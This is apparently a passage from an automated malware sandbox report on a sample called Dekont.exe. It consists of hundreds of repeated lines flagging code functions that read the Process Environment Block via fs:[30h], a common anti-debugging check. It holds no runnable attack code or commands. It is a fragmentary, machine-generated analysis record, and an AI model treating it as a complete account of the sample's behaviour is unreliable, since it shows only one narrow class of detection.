          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E284 mov eax, dword ptr fs:[00000030h]5_2_0100E284
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E284 mov eax, dword ptr fs:[00000030h]5_2_0100E284
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01050283 mov eax, dword ptr fs:[00000030h]5_2_01050283
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01050283 mov eax, dword ptr fs:[00000030h]5_2_01050283
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01050283 mov eax, dword ptr fs:[00000030h]5_2_01050283
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010662A0 mov eax, dword ptr fs:[00000030h]5_2_010662A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010662A0 mov ecx, dword ptr fs:[00000030h]5_2_010662A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010662A0 mov eax, dword ptr fs:[00000030h]5_2_010662A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010662A0 mov eax, dword ptr fs:[00000030h]5_2_010662A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010662A0 mov eax, dword ptr fs:[00000030h]5_2_010662A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010662A0 mov eax, dword ptr fs:[00000030h]5_2_010662A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCC310 mov ecx, dword ptr fs:[00000030h]5_2_00FCC310
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF0310 mov ecx, dword ptr fs:[00000030h]5_2_00FF0310
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01066500 mov eax, dword ptr fs:[00000030h]5_2_01066500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD04E5 mov ecx, dword ptr fs:[00000030h]5_2_00FD04E5
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD64AB mov eax, dword ptr fs:[00000030h]5_2_00FD64AB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100656A mov eax, dword ptr fs:[00000030h]5_2_0100656A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100656A mov eax, dword ptr fs:[00000030h]5_2_0100656A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100656A mov eax, dword ptr fs:[00000030h]5_2_0100656A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01004588 mov eax, dword ptr fs:[00000030h]5_2_01004588
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFA470 mov eax, dword ptr fs:[00000030h]5_2_00FFA470
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFA470 mov eax, dword ptr fs:[00000030h]5_2_00FFA470
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFA470 mov eax, dword ptr fs:[00000030h]5_2_00FFA470
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E59C mov eax, dword ptr fs:[00000030h]5_2_0100E59C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FC645D mov eax, dword ptr fs:[00000030h]5_2_00FC645D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010505A7 mov eax, dword ptr fs:[00000030h]5_2_010505A7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010505A7 mov eax, dword ptr fs:[00000030h]5_2_010505A7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010505A7 mov eax, dword ptr fs:[00000030h]5_2_010505A7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF245A mov eax, dword ptr fs:[00000030h]5_2_00FF245A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E5CF mov eax, dword ptr fs:[00000030h]5_2_0100E5CF
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E5CF mov eax, dword ptr fs:[00000030h]5_2_0100E5CF
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A5D0 mov eax, dword ptr fs:[00000030h]5_2_0100A5D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A5D0 mov eax, dword ptr fs:[00000030h]5_2_0100A5D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCC427 mov eax, dword ptr fs:[00000030h]5_2_00FCC427
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCE420 mov eax, dword ptr fs:[00000030h]5_2_00FCE420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCE420 mov eax, dword ptr fs:[00000030h]5_2_00FCE420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCE420 mov eax, dword ptr fs:[00000030h]5_2_00FCE420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C5ED mov eax, dword ptr fs:[00000030h]5_2_0100C5ED
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C5ED mov eax, dword ptr fs:[00000030h]5_2_0100C5ED
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01008402 mov eax, dword ptr fs:[00000030h]5_2_01008402
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01008402 mov eax, dword ptr fs:[00000030h]5_2_01008402
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01008402 mov eax, dword ptr fs:[00000030h]5_2_01008402
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD25E0 mov eax, dword ptr fs:[00000030h]5_2_00FD25E0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD65D0 mov eax, dword ptr fs:[00000030h]5_2_00FD65D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A430 mov eax, dword ptr fs:[00000030h]5_2_0100A430
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF45B1 mov eax, dword ptr fs:[00000030h]5_2_00FF45B1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF45B1 mov eax, dword ptr fs:[00000030h]5_2_00FF45B1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105C460 mov ecx, dword ptr fs:[00000030h]5_2_0105C460
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD2582 mov eax, dword ptr fs:[00000030h]5_2_00FD2582
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD2582 mov ecx, dword ptr fs:[00000030h]5_2_00FD2582
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD8550 mov eax, dword ptr fs:[00000030h]5_2_00FD8550
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD8550 mov eax, dword ptr fs:[00000030h]5_2_00FD8550
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010044B0 mov ecx, dword ptr fs:[00000030h]5_2_010044B0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105A4B0 mov eax, dword ptr fs:[00000030h]5_2_0105A4B0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE53E mov eax, dword ptr fs:[00000030h]5_2_00FFE53E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE53E mov eax, dword ptr fs:[00000030h]5_2_00FFE53E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE53E mov eax, dword ptr fs:[00000030h]5_2_00FFE53E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE53E mov eax, dword ptr fs:[00000030h]5_2_00FFE53E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE53E mov eax, dword ptr fs:[00000030h]5_2_00FFE53E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0535 mov eax, dword ptr fs:[00000030h]5_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0535 mov eax, dword ptr fs:[00000030h]5_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0535 mov eax, dword ptr fs:[00000030h]5_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0535 mov eax, dword ptr fs:[00000030h]5_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0535 mov eax, dword ptr fs:[00000030h]5_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0535 mov eax, dword ptr fs:[00000030h]5_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C700 mov eax, dword ptr fs:[00000030h]5_2_0100C700
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01000710 mov eax, dword ptr fs:[00000030h]5_2_01000710
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C720 mov eax, dword ptr fs:[00000030h]5_2_0100C720
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C720 mov eax, dword ptr fs:[00000030h]5_2_0100C720
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104C730 mov eax, dword ptr fs:[00000030h]5_2_0104C730
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100273C mov eax, dword ptr fs:[00000030h]5_2_0100273C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100273C mov ecx, dword ptr fs:[00000030h]5_2_0100273C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100273C mov eax, dword ptr fs:[00000030h]5_2_0100273C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100674D mov esi, dword ptr fs:[00000030h]5_2_0100674D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100674D mov eax, dword ptr fs:[00000030h]5_2_0100674D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100674D mov eax, dword ptr fs:[00000030h]5_2_0100674D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01054755 mov eax, dword ptr fs:[00000030h]5_2_01054755
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012750 mov eax, dword ptr fs:[00000030h]5_2_01012750
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012750 mov eax, dword ptr fs:[00000030h]5_2_01012750
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105E75D mov eax, dword ptr fs:[00000030h]5_2_0105E75D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD4690 mov eax, dword ptr fs:[00000030h]5_2_00FD4690
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD4690 mov eax, dword ptr fs:[00000030h]5_2_00FD4690
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107678E mov eax, dword ptr fs:[00000030h]5_2_0107678E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010847A0 mov eax, dword ptr fs:[00000030h]5_2_010847A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEC640 mov eax, dword ptr fs:[00000030h]5_2_00FEC640
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010507C3 mov eax, dword ptr fs:[00000030h]5_2_010507C3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD262C mov eax, dword ptr fs:[00000030h]5_2_00FD262C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEE627 mov eax, dword ptr fs:[00000030h]5_2_00FEE627
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105E7E1 mov eax, dword ptr fs:[00000030h]5_2_0105E7E1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD47FB mov eax, dword ptr fs:[00000030h]5_2_00FD47FB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD47FB mov eax, dword ptr fs:[00000030h]5_2_00FD47FB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E609 mov eax, dword ptr fs:[00000030h]5_2_0104E609
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF27ED mov eax, dword ptr fs:[00000030h]5_2_00FF27ED
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF27ED mov eax, dword ptr fs:[00000030h]5_2_00FF27ED
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF27ED mov eax, dword ptr fs:[00000030h]5_2_00FF27ED
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012619 mov eax, dword ptr fs:[00000030h]5_2_01012619
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01006620 mov eax, dword ptr fs:[00000030h]5_2_01006620
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01008620 mov eax, dword ptr fs:[00000030h]5_2_01008620
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDC7C0 mov eax, dword ptr fs:[00000030h]5_2_00FDC7C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD07AF mov eax, dword ptr fs:[00000030h]5_2_00FD07AF
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A660 mov eax, dword ptr fs:[00000030h]5_2_0100A660
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A660 mov eax, dword ptr fs:[00000030h]5_2_0100A660
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109866E mov eax, dword ptr fs:[00000030h]5_2_0109866E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109866E mov eax, dword ptr fs:[00000030h]5_2_0109866E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01002674 mov eax, dword ptr fs:[00000030h]5_2_01002674
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD8770 mov eax, dword ptr fs:[00000030h]5_2_00FD8770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C6A6 mov eax, dword ptr fs:[00000030h]5_2_0100C6A6
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD0750 mov eax, dword ptr fs:[00000030h]5_2_00FD0750
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010066B0 mov eax, dword ptr fs:[00000030h]5_2_010066B0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0100A6C7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A6C7 mov eax, dword ptr fs:[00000030h]5_2_0100A6C7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD0710 mov eax, dword ptr fs:[00000030h]5_2_00FD0710
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010506F1 mov eax, dword ptr fs:[00000030h]5_2_010506F1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010506F1 mov eax, dword ptr fs:[00000030h]5_2_010506F1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E6F2 mov eax, dword ptr fs:[00000030h]5_2_0104E6F2
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E6F2 mov eax, dword ptr fs:[00000030h]5_2_0104E6F2
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E6F2 mov eax, dword ptr fs:[00000030h]5_2_0104E6F2
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E6F2 mov eax, dword ptr fs:[00000030h]5_2_0104E6F2
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E908 mov eax, dword ptr fs:[00000030h]5_2_0104E908
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E908 mov eax, dword ptr fs:[00000030h]5_2_0104E908
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105C912 mov eax, dword ptr fs:[00000030h]5_2_0105C912
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0106892B mov eax, dword ptr fs:[00000030h]5_2_0106892B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105892A mov eax, dword ptr fs:[00000030h]5_2_0105892A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE8C0 mov eax, dword ptr fs:[00000030h]5_2_00FFE8C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01050946 mov eax, dword ptr fs:[00000030h]5_2_01050946
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0101096E mov eax, dword ptr fs:[00000030h]5_2_0101096E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0101096E mov edx, dword ptr fs:[00000030h]5_2_0101096E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0101096E mov eax, dword ptr fs:[00000030h]5_2_0101096E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105C97C mov eax, dword ptr fs:[00000030h]5_2_0105C97C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD0887 mov eax, dword ptr fs:[00000030h]5_2_00FD0887
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01074978 mov eax, dword ptr fs:[00000030h]5_2_01074978
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01074978 mov eax, dword ptr fs:[00000030h]5_2_01074978
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD4859 mov eax, dword ptr fs:[00000030h]5_2_00FD4859
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD4859 mov eax, dword ptr fs:[00000030h]5_2_00FD4859
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010589B3 mov esi, dword ptr fs:[00000030h]5_2_010589B3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010589B3 mov eax, dword ptr fs:[00000030h]5_2_010589B3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010589B3 mov eax, dword ptr fs:[00000030h]5_2_010589B3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE2840 mov ecx, dword ptr fs:[00000030h]5_2_00FE2840
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010669C0 mov eax, dword ptr fs:[00000030h]5_2_010669C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2835 mov eax, dword ptr fs:[00000030h]5_2_00FF2835
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2835 mov eax, dword ptr fs:[00000030h]5_2_00FF2835
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2835 mov eax, dword ptr fs:[00000030h]5_2_00FF2835
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2835 mov ecx, dword ptr fs:[00000030h]5_2_00FF2835
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2835 mov eax, dword ptr fs:[00000030h]5_2_00FF2835
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2835 mov eax, dword ptr fs:[00000030h]5_2_00FF2835
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010049D0 mov eax, dword ptr fs:[00000030h]5_2_010049D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109A9D3 mov eax, dword ptr fs:[00000030h]5_2_0109A9D3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105E9E0 mov eax, dword ptr fs:[00000030h]5_2_0105E9E0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010029F9 mov eax, dword ptr fs:[00000030h]5_2_010029F9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010029F9 mov eax, dword ptr fs:[00000030h]5_2_010029F9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105C810 mov eax, dword ptr fs:[00000030h]5_2_0105C810
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]5_2_00FDA9D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]5_2_00FDA9D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]5_2_00FDA9D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]5_2_00FDA9D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]5_2_00FDA9D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]5_2_00FDA9D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A830 mov eax, dword ptr fs:[00000030h]5_2_0100A830
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107483A mov eax, dword ptr fs:[00000030h]5_2_0107483A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107483A mov eax, dword ptr fs:[00000030h]5_2_0107483A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD09AD mov eax, dword ptr fs:[00000030h]5_2_00FD09AD
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD09AD mov eax, dword ptr fs:[00000030h]5_2_00FD09AD
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01000854 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01066870 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0105E872 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0105C89D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FF6962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FC8918 mov eax, dword ptr fs:[00000030h]
